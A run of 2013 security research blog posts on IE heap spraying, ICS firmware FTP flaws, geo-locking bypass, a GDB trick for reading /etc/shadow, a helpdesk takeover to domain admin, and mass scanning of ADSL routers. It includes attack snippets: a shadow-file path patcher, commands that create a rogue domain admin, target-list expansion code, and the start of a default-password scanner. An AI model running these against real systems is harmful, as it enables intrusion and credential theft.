INSIGHTS | August 23, 2013

IE heaps at Nordic Security Conference

Remember when I used to be the Windows Heap guy? Yeah, me neither ;). I just wanted to give everyone a heads up regarding my upcoming presentation “An Examination of String Allocations: IE-9 Edition” at Nordic Security Conference (www.nsc.is). The presentation title is a bit vague so I figured I would give a quick overview.
First, I’ll briefly discuss the foundational knowledge regarding heap-based memory allocations using JavaScript strings in IE-6 and IE-7. These techniques for manipulating the heap are well documented and have been known for quite some time [1].

While heap spraying and allocation techniques have continued to be used, public documentation of such techniques has been lacking. I specifically remember Nico Waisman talking about using the DOM [2] to perform precise allocations, but I don’t recall specific details being released. Nico’s presentation inspired me to reverse engineer a small portion of IE-9’s JavaScript implementation as it relates to string-based memory manipulation techniques. (Editor’s note: I’ve been holding onto this for 2 years, WTF Chris?)

Next I’ll cover, in detail, the data structures and algorithms used in IE-9 that are common during the exploitation process when performing typical string manipulations. Hopefully the details will give insight into what actually happens for vanilla exploitation attempts.

Lastly, I’ll demo a library which I’m calling heapLib2. HeapLib2 is an extension of Alex Sotirov’s original heap library that works with modern versions of Internet Explorer when precise heap-based allocations are required. You can now do some neat memory tricks with a few simple lines.

 



One final reflection: if you haven’t been to Nordic Security Conference (or Iceland in general), you should consider going. The conference has an attentive but laid-back atmosphere while providing both highly technical and high-level security presentations. If you’ve been looking for an excuse to go to Iceland, get yourself to Nordic Security Conference!

 
[1] – http://www.phreedom.org/research/heap-feng-shui/
P.S. These techniques _MAY_ work with versions of IE that are greater than version 9

 

P.P.S. Ok, they DO work.
INSIGHTS | July 25, 2013

Las Vegas 2013

Once again, that time of year is approaching: thousands of people from the security community are preparing to head to Las Vegas for the most important hacking events, Black Hat USA and DefCon. IOActive will, as we do every year, have an important presence at these conferences.

We have some great researchers from our team presenting at Black Hat USA and DefCon. At Black Hat USA, Barnaby Jack will be presenting “Implantable medical devices: hacking humans”, and Lucas Apa and Carlos Mario Panagos will be presenting “Compromising industrial facilities from 40 miles away”. At DefCon, Chris Valasek will be presenting “Adventures in automotive networks and control units”.
These will probably be among the most talked-about presentations, so don’t miss them!
During Black Hat USA, IOActive will also be hosting IOAsis. This event gives you an opportunity to meet our researchers, listen to some interesting presentations, participate in a hacking hardware workshop, and more—all while enjoying great drinks, food, and a massage.

 

Also, back by popular demand and for the third time in a row, IOActive will be sponsoring and hosting Barcon. This is an invitation-only event where our top, l33t, sexy (maybe not) researchers meet to drink and talk.

 

Lastly (but not least important), we are once again hosting “Freakshow”, our greatest and most popular DefCon party, on Saturday, August 3rd at 9am at The Rio pools.

 

For your convenience, here are the details on our talks at Black Hat USA and DefCon:

 

IMPLANTABLE MEDICAL DEVICES: HACKING HUMANS
Who: Barnaby Jack
Where & When: Black Hat USA, August 1st, 2:15pm

 

In 2006, approximately 350,000 pacemakers and 173,000 ICDs (Implantable Cardioverter Defibrillators) were implanted in the US alone. 2006 was an important year; this is when the FDA began approving fully wireless-based devices. Today there are well over 3 million pacemakers and over 1.7 million ICDs in use.
In this talk, I will focus on the security of wireless implantable medical devices and discuss how these devices operate and communicate and the security shortcomings of the current protocols. I will reveal IOActive’s internal research software that uses a common bedside transmitter to scan for and interrogate individual medical implants. Finally, I will discuss techniques that manufacturers can implement to improve the security of these devices.

 

COMPROMISING INDUSTRIAL FACILITIES FROM 40 MILES AWAY
Who: Lucas Apa and Carlos Mario Panagos
Where & When: Black Hat USA, August 1st, 3:30pm

 

The evolution of wireless technologies has allowed industrial automation and control systems (IACS) to become strategic assets for companies that rely on processing plants and facilities in industries such as energy production, oil, gas, water, utilities, refining, and petrochemical distribution and processing. Effective wireless sensor networks have enabled these companies to reduce implementation, maintenance, and equipment costs and enhance personal safety by enabling new topologies for remote monitoring and administration in hazardous locations.
However, the manner in which sensor networks handle and control cryptographic keys is very different from the way in which they are handled in traditional business networks. Sensor networks involve large numbers of sensor nodes with limited hardware capabilities, so the distribution and revocation of keys is not a trivial task.
In this presentation, we will review the most commonly implemented key distribution schemes, their weaknesses, and how vendors can more effectively align their designs with key distribution solutions. We will also demonstrate some attacks that exploit key distribution vulnerabilities, which we recently discovered in every wireless device developed over the past few years by three leading industrial wireless automation solution providers. These devices are widely used by many energy, oil, water, nuclear, natural gas, and refined petroleum companies.
An untrusted user or group within a 40-mile range could read from and inject data into these devices using radio frequency (RF) transceivers. A remotely and wirelessly exploitable memory corruption bug could disable all the sensor nodes and forever shut down an entire facility. When sensors and transmitters are attacked, remote sensor measurements on which critical decisions are made can be modified. This can lead to unexpected, harmful, and dangerous consequences.

 

Adventures in Automotive Networks and Control Units
Who: Chris Valasek
Where & When: DefCon, August 2nd, 10:00am
Automotive computers, or Electronic Control Units (ECUs), were originally introduced to help with the fuel efficiency and emissions problems of the 1970s, but have evolved into integral parts of in-car entertainment, safety controls, and enhanced automotive functionality.
In this presentation, I will examine some controls in two modern automobiles from a security researcher’s point of view. I will first cover the requisite tools and software needed to analyze a Controller Area Network (CAN) bus. I will also demo software to show how data can be read from and written to the CAN bus. Then I will show how certain proprietary messages can be replayed by a device hooked up to an OBD-II connection to perform critical car functions, such as braking and steering. Finally, I will discuss aspects of reading and modifying the firmware of ECUs installed in today’s modern automobiles.
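For readers unfamiliar with the data involved, here is a minimal Python sketch of unpacking a raw Linux SocketCAN frame into its arbitration ID and payload. The frame contents below are illustrative and are not taken from the talk.

```python
import struct

def parse_can_frame(raw: bytes):
    """Parse a 16-byte Linux SocketCAN frame:
    32-bit CAN ID, 1-byte DLC, 3 pad bytes, 8 data bytes."""
    can_id, dlc, data = struct.unpack("<IB3x8s", raw)
    return {
        "id": can_id & 0x1FFFFFFF,  # mask off the ERR/RTR/EFF flag bits
        "dlc": dlc,
        "data": data[:dlc],
    }

# Illustrative frame: arbitration ID 0x220 with 4 data bytes.
raw = struct.pack("<IB3x8s", 0x220, 4, b"\xde\xad\xbe\xef")
frame = parse_can_frame(raw)
print(hex(frame["id"]), frame["data"].hex())  # prints: 0x220 deadbeef
```

In practice, tools built on SocketCAN read these 16-byte frames straight from a raw socket; the replay attacks described in the talk amount to writing crafted frames of the same shape back onto the bus.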

 

INSIGHTS | July 4, 2013

Why sanitize excessed equipment

My passion for cybersecurity centers on industrial controllers: PLCs, RTUs, and the other “field devices.” These devices are the interface between the integrator (e.g., HMI systems, historians, and databases) and the process (e.g., sensors and actuators). Researching this equipment can be costly because PLCs and RTUs cost thousands of dollars. Fortunately, I have an ally: surplus resellers that sell used equipment.

I have been buying used equipment for a few years now. Equipment often arrives literally ripped from a factory floor or even a substation. Each controller typically contains a wealth of information about its origin, and I can often learn a lot about a company from a piece of used equipment. Even decades-old control equipment has a lot of memory and keeps a long record of the previous owner’s process. With just a few hours of reverse engineering work on a controller, it is possible to learn the “secret recipe”: company names, control system network layout, and production history. Even engineers’ names and contact information are likely to be stored in a controller’s log file. For a bad guy, this data could be useful for all sorts of purposes: social engineering employees, insider trading of company stock, and possibly direct attacks on the corporate network.
When I find this type of information, I reach out to the equipment’s original owner. I help them wipe the equipment, and I point them to where the rest of their equipment is being sold so they can try to recall it before the stored information ends up in the wrong hands. I am not the only one doing this kind of work. Recently, Billy Rios and Terry McCorkle revealed surplus equipment that they had purchased from a hospital; it contained much of the same information about its origin.

These situations can be prevented by sanitizing the equipment before it’s released for disposal. Many equipment manufacturers should be able to provide instructions for this process. One option may be to send the controller back to the manufacturer to be sanitized and refurbished.
A way to provide another layer of protection against information disclosure is to have a robust and well-practiced Incident Response plan. Most places that I contact are great to work with and are receptive to the information.

Ignoring the issue, especially where a public utility is concerned, may even be considered a compliance violation. Set up an Incident Response program now and make sure that your process control engineers know to send equipment disposal issues through the IR group.

 

A great deal can be accomplished to keep a control system secure. With a little planning, proper equipment disposal is one of the cheapest things that can be done to keep proprietary process information safe.
INSIGHTS | June 4, 2013

Industrial Device Firmware Can Reveal FTP Treasures!

Security professionals are becoming more aware of backdoors, security bugs, insecure certificate handling, and similar flaws within ICS device firmware. I want to highlight another issue that is common in the firmware of critical industrial devices: the remote access some vendors set up between their devices and their ftp servers for troubleshooting or testing. In many cases this remote access could allow an attacker to compromise the device itself, the company the device belongs to, or even the entire vendor organization.
I discovered this vulnerability while tracking connectivity test functions within the firmware for an industrial device gateway. During my research I landed on a script with ftp server information that is transmitted in the clear:
The script tests connectivity and includes two subtests. The first is a simple ping to the host “8.8.8.8”. The second uses an internal ftp client to download a test file from the vendor’s ftp server and then upload the results back to the vendor’s server. The key instructions use the wget and wput commands shown in the screen shot.
In this script, the wget function downloads a test file from the vendor’s ftp server. When the test is complete, the wput function inserts the serial number of the device into the file name before the file is uploaded back to the vendor.
This is probably done to ensure that file names identify unique devices and for traceability.
This practice actually involves two vulnerabilities:
  • Using the device serial number as part of a filename on a relatively accessible ftp server.
  • Hardcoding the ftp server credentials within the firmware.
This combination could enable an attacker to connect to the ftp server and obtain the devices’ serial numbers.
The risk increases for the devices I am investigating because these device serial numbers are also used by the vendor to generate default admin passwords. This knowledge could allow an attacker to build a database of admin passwords for all of this vendor’s devices.
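As a rough illustration of that attack chain, here is a Python sketch of how filenames harvested from such an ftp server could be turned into a table of candidate default passwords. The filename pattern and the password-derivation function are placeholders of my own invention; the vendor’s actual scheme is deliberately not disclosed here.

```python
import hashlib
import re

# Hypothetical filename pattern: a results file with an embedded serial number.
FILENAME_RE = re.compile(r"test-(?P<serial>[A-Z0-9]{8})\.txt")

def derive_default_password(serial: str) -> str:
    """Placeholder derivation; stands in for whatever transform the
    vendor applies to a serial number to produce a default password."""
    return hashlib.md5(serial.encode()).hexdigest()[:8]

def build_password_db(ftp_listing):
    """Map every serial number found in an ftp directory listing to a
    candidate default admin password."""
    db = {}
    for name in ftp_listing:
        m = FILENAME_RE.match(name)
        if m:
            serial = m.group("serial")
            db[serial] = derive_default_password(serial)
    return db

listing = ["test-AB12CD34.txt", "readme.txt", "test-ZZ99YY88.txt"]
print(build_password_db(listing))
```

The point is not the specific transform; it is that once filenames leak serial numbers and serial numbers determine passwords, the entire fleet can be enumerated offline.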
Another security issue comes from a different script that points to the same ftp server, this time involving anonymous access.
This vendor uses anonymous access to upload statistics gathered from each device, probably for debugging purposes. These instructions are part of the function illustrated below.
As in the first script, the name of the zipped file that is sent back to the ftp server includes the serial number.
The script even prompts the user to add the company name to the file name.
An attacker with this information can easily build a database of admin passwords linked to the company that owns the device.

 

The third script, which also involves anonymous open access to the ftp server, gathers the device configuration and uploads it to the server. The only difference between this and the previous script is the naming function, which uses the configs- prefix instead of the stats- prefix.
The anonymous account can only write files to the ftp server. This prevents anonymous users from downloading configuration files. However, the server is running an old version of the ftp service, which is vulnerable to public exploits that could allow full access to the server.
A quick review shows that many common information security best practice rules are being broken:
  1. Naming conventions disclose device serial numbers and company names. In addition, these serial numbers are used to generate unique admin passwords for each device.
  2. Credentials for the vendor’s ftp server are hard coded within device firmware. This would allow anyone who can reverse engineer the firmware to access sensitive customer information such as device serial numbers.
  3. Anonymous write access to the vendor’s ftp server is enabled. This server contains sensitive customer information, which can expose device configuration data to an attacker from the public Internet. The ftp server also contains sensitive information about the vendor.
  4. Sensitive and critical data such as industrial device configuration files are transferred in clear text.
  5. A server containing sensitive customer data and running an older version of ftp that is vulnerable to a number of known exploits is accessible from the Internet.
  6. Clear-text protocols are used to transfer sensitive information over the public Internet.
Based on this review we recommend some best practices to remediate the vulnerabilities described in this article:
  1. Use secure naming conventions that do not involve potentially sensitive information.
  2. Do not hard-code credentials into firmware (read previous blog post by Ruben Santamarta).
  3. Do not transfer sensitive data using clear text protocols. Use encrypted protocols to protect data transfers.
  4. Do not transfer sensitive data unless it is encrypted. Use strong encryption to protect sensitive data before it is transferred.
  5. Do not expose sensitive customer information on public ftp servers that allow anonymous access.
  6. Enforce a strong patch policy. Servers and services must be patched and updated as needed to protect against known vulnerabilities.
INSIGHTS | May 7, 2013

Bypassing Geo-locked BYOD Applications

In the wake of increasingly lenient BYOD policies within large corporations, there’s been a growing emphasis upon restricting access to business applications (and data) to specific geographic locations. Over the last 18 months more than a dozen start-ups in North America alone have sprung up seeking to offer novel security solutions in this space – essentially looking to provide mechanisms for locking application usage to a specific location or distance from an office, and ensuring that key data or functionality becomes inaccessible outside these prescribed zones.
These “Geo-locking” technologies are in hot demand as organizations try desperately to regain control of their networks, applications and data.

Over the past 9 months I’ve been asked by clients and potential investors alike for advice on the various technologies and the companies behind them. There’s quite a spectrum of available options in the geo-locking space; each start-up has a different take on the situation and has proposed (or developed) a unique way of tackling the problem. Unfortunately, in the race to secure a position in this evolving security market, much of the literature being thrust at potential customers is heavy in FUD and light in technical detail.
It may be because marketing departments are riding roughshod over the technical folks in order to establish these new companies, but with several of the solutions being proposed I’ve had concerns about the scope of the security element on offer. It’s not that the approaches being marketed aren’t useful or won’t work; it’s that they’ve defined the problem they’re aiming to solve so narrowly that they’ve developed what I can only describe as tunnel vision with respect to the spectrum of threats organizations are likely to face in the BYOD realm.
In the meantime I wanted to offer this quick primer on the evolving security space that has become BYOD geo-locking.
Geo-locking BYOD
The general premise behind the current generation of geo-locking technologies is that each BYOD gadget will connect wirelessly to the corporate network and interface with critical applications. When the device is moved away from the location, those applications and data should no longer be accessible.
There are a number of approaches, but the most popular strategies can be categorized as follows:
  1. Thick-client – A full-featured application is downloaded to the BYOD gadget and typically monitors physical location elements using telemetry from GPS or the wireless carrier directly. If the location isn’t “approved” the application prevents access to any data stored locally on the device.
  2. Thin-client – a small application or driver is installed on the BYOD gadget to interface with the operating system and retrieve location information (e.g. GPS position, wireless carrier information, IP address, etc.). This application then incorporates this location information in to requests to access applications or data stored on remote systems – either through another on-device application or over a Web interface.
  3. Share-my-location – Many mobile operating systems include opt-in functionality to “share my location” via their built-in web browser. Embedded within the page request is a short geo-location description.
  4. Signal proximity – The downloaded application or driver will only interface with remote systems and data if the wireless channel being connected to by the device is approved. This is typically tied to WiFi and nanocell routers with unique identifiers and has a maximum range limited to the power of the transmitter (e.g. 50-100 meters).

The critical problem with the first three geo-locking techniques can be summed up simply as “any device can be made to lie about its location”.

The majority of start-ups have simply assumed that the geo-location information coming from the device is correct – and have not included any means of securing the integrity of that device’s location information. A few have even tried to tell customers (and investors) that it’s impossible for a device to lie about its GPS location or a location calculated off cell-tower triangulation. I suppose it should not be a surprise though – we’ve spent two decades trying to educate Web application developers to not trust client-side input validation and yet they still fall for web browser manipulations.
A quick search for “fake location” on the Apple and Android stores will reveal the prevalence and accessibility of GPS fakery. Any other data being reported from the gadget – IP address, network MAC address, cell-tower connectivity, etc. – can similarly be manipulated. In addition to manipulation of the BYOD gadget directly, alternative vectors that make use of private VPNs and local network jump points may be sufficient to bypass thin-client and “share-my-location” geo-locking application approaches.
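To make the client-trust problem concrete, here is a minimal Python sketch of the kind of server-side geofence check that the thin-client and “share-my-location” approaches imply. All names and coordinates are my own illustration. The check is only as trustworthy as the coordinates the device chooses to report; a spoofed payload passes exactly like a genuine one.

```python
import math

OFFICE = (51.5074, -0.1278)  # illustrative "approved" location
RADIUS_KM = 0.5              # devices must report a position within 500 m

def haversine_km(a, b):
    """Great-circle distance between two (lat, lon) points in kilometers."""
    lat1, lon1, lat2, lon2 = map(math.radians, (*a, *b))
    dlat, dlon = lat2 - lat1, lon2 - lon1
    h = math.sin(dlat / 2) ** 2 + \
        math.cos(lat1) * math.cos(lat2) * math.sin(dlon / 2) ** 2
    return 2 * 6371 * math.asin(math.sqrt(h))

def access_allowed(reported_location):
    # The flaw: "reported_location" comes straight from the client,
    # so the server has no way to verify it.
    return haversine_km(OFFICE, reported_location) <= RADIUS_KM

# A device physically in another country simply reports office coordinates:
spoofed = (51.5074, -0.1278)
print(access_allowed(spoofed))  # prints: True
```

Nothing in the geometry is wrong; the failure is architectural, because the integrity of the input was never established.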
That doesn’t mean that these geo-locking technologies should be considered unicorn pelts, but it does mean that organizations seeking to deploy them need to invest some time in determining the category of threat (and opponent) they’re prepared to combat.
If the worst-case scenario is a nurse losing a hospital iPad and an inept thief trying to access patient records from another part of the city, then many of the geo-locking approaches will work quite well. However, if the scenario is a tech-savvy reporter paying the nurse for access to the hospital iPad and prepared to install a few small applications that manipulate the geo-location information in order to remotely access celebrity patient records… well, then you’ll need a different class of defense.
Given the rapid evolution of BYOD geo-locking applications and the number of new businesses offering security solutions in this space, my advice is two-fold – determine the worst case scenarios you’re trying to protect against, and thoroughly assess the technology prior to investment. Don’t be surprised if the marketing claims being made by many of these start-ups are a generation or two ahead of what the product is capable of performing today.
Having already assessed or reviewed the approaches of several start-ups in this particular BYOD security realm, I believe some degree of skepticism and caution is warranted.
— Gunter Ollmann, CTO IOActive
INSIGHTS | April 18, 2013

InfoSec Europe 2013 – Security on Tap

It’s that time of the year again as Europe’s largest and most prestigious information security conference “Infosecurity Europe” gets ready to kick off next week at Earls Court, London, UK.

This year’s 18th annual security gathering features over 350 exhibitors, but you won’t find IOActive on the floor of the conference center. Oh no, we’re pulling out all the stops and have picked a quieter and more exclusive location to conduct our business just around the corner. After all, why would you want to discuss confidential security issues on a floor with 12,500 other folks?

We all know what these conferences are like. We psych ourselves up for a couple of days of shuffling from one booth to the next, avoiding eye contact with the glammed-up staff working their magic on blah-blah vendor’s booth, whose only mission in life is to scan your badge so that a far-off marketing team can spam you for the next 6 months with updates about a product you had no interest in. And you let them scan your badge anyway, because they were giving away an interesting foam boomerang (that probably cost 20 pence) which you thought one of your kids might like, as recompense for the guilt you’re feeling at having to be away from home one evening so you could see all of what the conference had to offer.

Well fret no more, IOActive have come to save the day!

After you’ve grown weary of the endless shuffling, avoided eye contact for as long as possible, grabbed enough swag to keep the neighbors’ grandchildren happy for a decade’s worth of birthdays, and the imminent prospect of queuing for overpriced, tasteless coffee and tea has made your eyes roll into the back of your skull one last time, come visit IOActive down the street at the pub we’ve taken over! Yes, that’s right, the IOActive crew has taken a pub hostage, and we’re inviting you and a select bunch of our VIPs to join us in a more relaxed and conducive business environment.

I hear tell that “Security on Tap” will include a range of fine ales, food, and other refreshments, and that the decibel level should be a good 50dB lower than Earls Court Conference Center. A little birdy also mentioned that there may be a whisky tasting at some point too. Oh, and there’ll be a bunch of us IOActive folks there as well. Chris Valasek and I, along with some of our top UK-based consultants, will be there to talk about the latest security threats and evil hackers. I think there’ll be some sales folks there too – but don’t worry, we’ll make sure their badge readers don’t work.

If you’d like to join us for drinks, refreshments and intelligent conversation in a venue that’s comfortable and won’t have you going hoarse (apparently “horse” is bad these days) – you’re cordially invited to join us at the Courtfield Pub (187 Earls Court Road, Earls Court, London, SW5 9AN). We’ll be there Tuesday and Wednesday (April 23rd & 24th) between 10:00 and 17:00.

— Gunter Ollmann, CTO IOActive

INSIGHTS | April 16, 2013

Can GDB’s List Source Code Be Used for Evil Purposes?

One day while debugging an ELF executable with the GNU Debugger (GDB), I asked myself, “How does GDB know which file to read when you use the list command?” (For the uninformed, the list command prints a specified number of lines from a source code file; ten lines is the default.)
Source code filenames are contained in the metadata of an ELF executable (in the .debug_line section, to be exact). When you use the list command, GDB will open(), read(), and display the file contents if and only if GDB has the permissions needed to read the source file. 
The following is a simple trick that lets you use GDB as a trampoline to read a file you don’t originally have permission to read. This trick could also be helpful in a binary capture-the-flag (CTF) or reverse engineering challenge.
Here are the steps:
 

1. Compile ‘foo.c’ with the GNU Compiler (GCC) using the -ggdb flag.

2. Open the resulting ELF executable with GDB and use the list command to read its source code, as shown in the following screen shot:

 

3. Make a copy of ‘foo.c’ and call it ‘_etc_shadow.c’, so that this name is hardcoded within the internal metadata structures of the compiled ELF executable as in the following screen shot.

 

4. Open the executable with your preferred hex editor (I used HT Editor because it supports the ELF file format) and replace ‘_etc_shadow.c’ with ‘/etc/shadow’ (don’t forget the NULL character at the end of the string) the first two times it appears.
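The hex-editor patch in step 4 can also be scripted. One detail matters: ‘/etc/shadow’ is shorter than ‘_etc_shadow.c’, so the replacement must be NUL-padded to the original length to keep all file offsets in the ELF intact. A minimal Python sketch (assuming the compiled binary is named ‘_etc_shadow’):

```python
def patch_source_path(data: bytes, old_name: bytes, new_name: bytes,
                      count: int = 2) -> bytes:
    """Replace a NUL-terminated source path inside ELF debug data,
    NUL-padding the new name so every file offset stays the same."""
    old = old_name + b"\x00"
    new = new_name + b"\x00"
    if len(new) > len(old):
        raise ValueError("replacement must not be longer than the original")
    patched = data.replace(old, new.ljust(len(old), b"\x00"), count)
    assert len(patched) == len(data)  # offsets unchanged
    return patched

# Usage against the compiled binary (work on a copy):
# data = open("_etc_shadow", "rb").read()
# open("patched", "wb").write(
#     patch_source_path(data, b"_etc_shadow.c", b"/etc/shadow"))
```

A hex editor works just as well; the script simply makes the NUL-padding requirement explicit and repeatable.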

 

5. Evidently, this won’t work unless you have sufficient privileges; otherwise GDB won’t be able to read /etc/shadow.

 

6. If you trace the open() syscalls executed by GDB:

$ strace -e open gdb ./_etc_shadow
you can see that it returns -1 (EACCES) because of insufficient permissions.
 

7. Now imagine that for some reason GDB is a privileged command (the SUID (Set User ID) bit in the permissions is enabled). Opening our modified ELF file with GDB, it would be possible to read the contents of ‘/etc/shadow’ because the gdb command would be executed with root privileges.

 

8. Imagine another hypothetical scenario: a hardened development (or CTF) server that has been configured with granular privileges using a tool such as Sudo to allow certain commands to be executed. (To be honest I have never seen a scenario like this before, but it’s an example worth considering to illustrate how this attack might evolve).

 

9. You cannot display the contents of ‘/etc/shadow’ by using the cat command because /bin/cat is an unauthorized command in our configuration. However, the gdb command has been authorized and therefore has the rights needed to display the source file (/etc/shadow):

 

Voilà! 
 

Taking advantage of this GDB feature and mixing it with other techniques could make a more sophisticated attack possible. Use your imagination.
 

Do you have other ideas how this could be used as an attack vector, either by itself or if combined with other techniques? Let me know.
INSIGHTS | April 10, 2013

What Would MacGyver Do?

“The great thing about a map: it gets you in and out of places in a lot of different ways.” – MacGyver

 

When I was young I was a big fan of the American TV show, MacGyver. Every week I tuned in to see how MacGyver would build some truly incredible things with very basic and unexpected materials — even if some of his solutions were hard to believe. For example, in one episode MacGyver built a futuristic motorized heat-seeking gun using only a set of batteries, an electric mixer, a rubber band, a serving cart, and half a suit of armor.

 
 

Since then I have always kept the “What would MacGyver do?” spirit in my thinking. Then again, I think I was “destined” to be an IT guy, and particularly to work in the security field, where we don’t have quite the same variety of materials to craft our solutions.

 

But the “What would MacGyver do?” frame of mind helped me figure out a simple way to completely “own” a network environment in a MacGyver sort of way using just a small set of steps, including:

 
  • Exploiting a bad use of tools.
  • A small piece of social engineering.
  • Some creativity.
  • A small number of manual configuration changes.

I’ll relate how I lucked into this opportunity, how easy it can be to exploit certain circumstances, and especially how easy it would be to use a similar technique to gain domain administrator access for a company network.

 

The whole situation was due to the way helpdesk support was provided at the company I was working for. For security reasons non-administrative domain users were prevented from installing software on their desktops. So when I tried to install a small software application I received a very respectful “access denied” message. I felt a bit annoyed by this but still wanted my application, so I called the helpdesk and asked them to finish the installation remotely for me.

 

The helpdesk person was amenable, so I gave him my machine name and soon saw a pop-up window indicating that someone had connected to my machine and was interacting with my desktop.

 
 
 

My first impression was “Oh cool, this helpdesk is responsive and soon my software will be installed and I can finally start my project.”

 

But when I thought about this a bit more I started to wonder how the helpdesk person could install my software since he was trying to do so with my user privileges and desktop session rather than logging me out and connecting as an administrator.

 

And here we arrive at our first Act.

 

Act #1: Bad use of tools

 

Everything became clear when the helpdesk guy emulated a Ctrl+Alt+Delete combination that brings up the Windows menu and its awesome Switch User option. 

 
 
 

The helpdesk guy clicked the Switch User option and here I saw some magic — namely the support guy logging in right before my eyes with the local Administrator account.

 
 

Picture this: the support guy was typing in the password directly in front of my eyes. Even though I am an IT guy this was the first time I ever saw a support person interacting live with the Windows login screen. I wished I could see or intercept the password, but unfortunately I only saw ugly black dots in the password dialog box.

 

At that moment I felt frustrated, because I realized how close I was to having the local administrator password. But how could I get it?

 

The magic became clearer when the support guy logged in as an administrator on the machine and I was able to see him interacting with the desktop. That really made my day.

 
 
 
 
 

And then something even more magnificent happened while I was watching: for some undefined reason the support guy encountered a Windows session error. He had no choice but to log out, which he did, and then he logged in again with the Domain Administrator account … again right before my eyes!

 

(I don’t have a domain lab set up right now, so I can’t duplicate the screen image, but I am sure you can imagine the login window, which would look just like the one above except that it would include the domain name.)

 

When he logged in as the domain administrator I saw another nice desktop and the helpdesk guy interacting with my machine right in front of my eyes as the domain admin.

 

This is when I had a devious idea: I moved my mouse one millimeter, and the pointer moved on screen while this guy was installing my software. At this point we arrive at the second Act.

 

Act #2: Some MacGyver magic

 

I asked myself, what if I did the following:

 
  • Unplug the network cable (I could have taken control of the mouse instead, but that would have aroused suspicion).
  • Stop the DameWare service that is providing access to the support guy.
  • Reconnect the network cable.
  • Create a new domain admin account (since the domain administrator is the operative account on my computer).
  • Restart the DameWare service.
  • Log out of the machine.
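For illustration, steps 2, 4, and 5 boil down to a handful of standard Windows commands. A minimal sketch follows; note that "DWMRCS" is only a guess at the DameWare service name (it varies by version), and the account name and password are placeholders:

```python
# Sketch of steps 2, 4, and 5 as the Windows commands they imply.
# "DWMRCS" is a guess at the DameWare service name (it varies by version),
# and the account name and password are hypothetical placeholders.
def takeover_commands(service="DWMRCS", user="helpdesk2", password="Hunter2!"):
    return [
        f'net stop "{service}"',                           # stop the remote-control service
        f'net user {user} {password} /add /domain',        # create a new domain account
        f'net group "Domain Admins" {user} /add /domain',  # promote it to domain admin
        f'net start "{service}"',                          # restart the service
    ]

for command in takeover_commands():
    print(command)
```

Typed at a command prompt during the admin's session, these four lines are what turn two minutes of access into domain-wide control.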

By completing these six steps, which wouldn’t have taken more than two minutes, I could have assumed domain administrator privileges for the entire company.
Let’s recap the formula for this awesome sauce:

 

1. Bad use of tools: It was totally wrong for the help desk person to open a domain admin session directly under the user’s eyes, giving him the opportunity to take control of the session. 

2. A small piece of social engineering: Just call the support desk and ask them to install some software for you. 

3. A small amount of finagling on your part: Use the following steps when the help desk person logs in to push him to log in as Domain Admin:

     •      Unplug the network cable (1 second).
     •      Change the local administrator password (7 seconds).
     •      Log out (2 seconds).
     •      Plug the network cable back in (1 second).

4. Another small piece of social engineering: Call the support person back and blame Microsoft Windows for a crash. Cross your fingers that after he is unable to log in as local admin (because you changed the password) he will instead log in as a domain administrator. 

5. Some more finagling on your part: Do the same steps defined in step 3 to create a new domain admin account.

6. Success: Enjoy being a domain administrator for the company.


Final Act: Conclusion


At the beginning of my IT security career I was a bit skeptical of the magic of social engineering. But through the years I have learned that social engineering still works and always will. Even if the social engineering involves the tiniest and most basic request, combined with some imagination it can let you own a huge company. And if you are conducting a pentest you don’t always have to rely exclusively on your technical expertise. You can draw on your imagination and creativity to build a powerful weapon from small and basic tools … just like MacGyver.
INSIGHTS | March 28, 2013

Behind ADSL Lines: How to Bankrupt ISPs While Making Money

Disclaimer: No businesses or even the Internet were harmed while researching this post. We will explore how an attacker can control the Internet access of one or more ISPs or countries through ordinary routers and Internet modems.

Cyber-attacks are hardly new in 2013. But what if an attack is both incredibly easy to construct and yet persistent enough to shut Internet services down for a few hours or even days? In this blog post we will talk about how easy it would be to enlist ordinary home Internet connections in this kind of attack, and then we suggest some potentially straightforward solutions to this problem.
The first problem
The Internet in the last 10 to 20 years has become the most pervasive way to communicate and share news on the planet. Today even people who are not at all technical and who do not love technology still use their computers and Internet-connected devices to share pictures, news, and almost everything else imaginable with friends and acquaintances.
All of these computers and devices connect to the Internet through CPEs (customer premises equipment) such as routers, modems, and set-top boxes. Although most people consider these CPEs to be little magic boxes that need no provisioning, in fact these plug-and-play devices are a key, yet weak, link behind many major attacks occurring across the web today.
These little magic boxes come with some nifty default features:
  • Updateable firmware.
  • Default passwords.
  • Port forwarding.
  • Accessibility over http or telnet.
 
The second problem
All ISPs across the world share a common flaw. Look at the following screenshot and think about how one might leverage this flaw.
Most ISPs that own one or more netblocks typically write meaningful descriptions that provide some insight into what they are used for.
Attack phase 1
So what could an attacker do with this data?
  1. They can gather a lot of information about netblocks for one or more ISPs and even countries and some information about their use from http://bgp.he.net and http://ipinfodb.com.
  2. Next, they can use whois or parse bgp.he.net to search for additional information about these netblocks, such as data about ADSL, DSL, Wi-Fi, Internet users, and so on.
  3. Finally, the attacker can convert the matched netblocks into IP addresses.
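The last two steps above can be sketched in a few lines. The sample netblocks and descriptions below are made-up documentation ranges, and the keyword list is illustrative; real whois/BGP descriptions vary widely by ISP:

```python
import ipaddress

# Keywords that typically mark consumer access networks in whois/BGP
# descriptions (illustrative list; real descriptions vary by ISP).
ACCESS_KEYWORDS = ("adsl", "dsl", "broadband", "dynamic", "pool")

def filter_access_netblocks(netblocks):
    """Keep only netblocks whose description suggests consumer ADSL/DSL use."""
    return [cidr for cidr, desc in netblocks
            if any(k in desc.lower() for k in ACCESS_KEYWORDS)]

def expand(cidrs):
    """Convert the matched netblocks into individual host addresses."""
    for cidr in cidrs:
        for ip in ipaddress.ip_network(cidr).hosts():
            yield str(ip)

blocks = [
    ("198.51.100.0/24", "EXAMPLE-ISP ADSL dynamic pool"),  # hypothetical data
    ("203.0.113.0/24",  "EXAMPLE-ISP core routers"),
]
targets = list(expand(filter_access_netblocks(blocks)))
print(len(targets))  # 254 usable host addresses from the one matching /24
```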
At this point the attacker could have:
  • Identified netblocks for an entire ISP or country.
  • Pinpointed a lot of ADSL networks, minimizing the effort required to scan the entire Internet. With a database gathered and sorted by ISP and country, an attacker can, if they want, target a specific ISP or country.
Next the attacker can test how many CPEs he can identify in a short space of time to see whether this attack would be worth pursuing:
A few hours later the results are in:
In this case the attacker has identified more than 400,000 CPEs that are potentially vulnerable to the simplest of attacks, which is to scan the CPEs using both telnet and http for their default passwords.
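A minimal sketch of that default-password scan against a single CPE’s telnet service follows. The credential list and the prompt heuristic are illustrative assumptions; real CPEs present wildly different banners and timing:

```python
import socket

# Illustrative default credential pairs; real lists are much longer.
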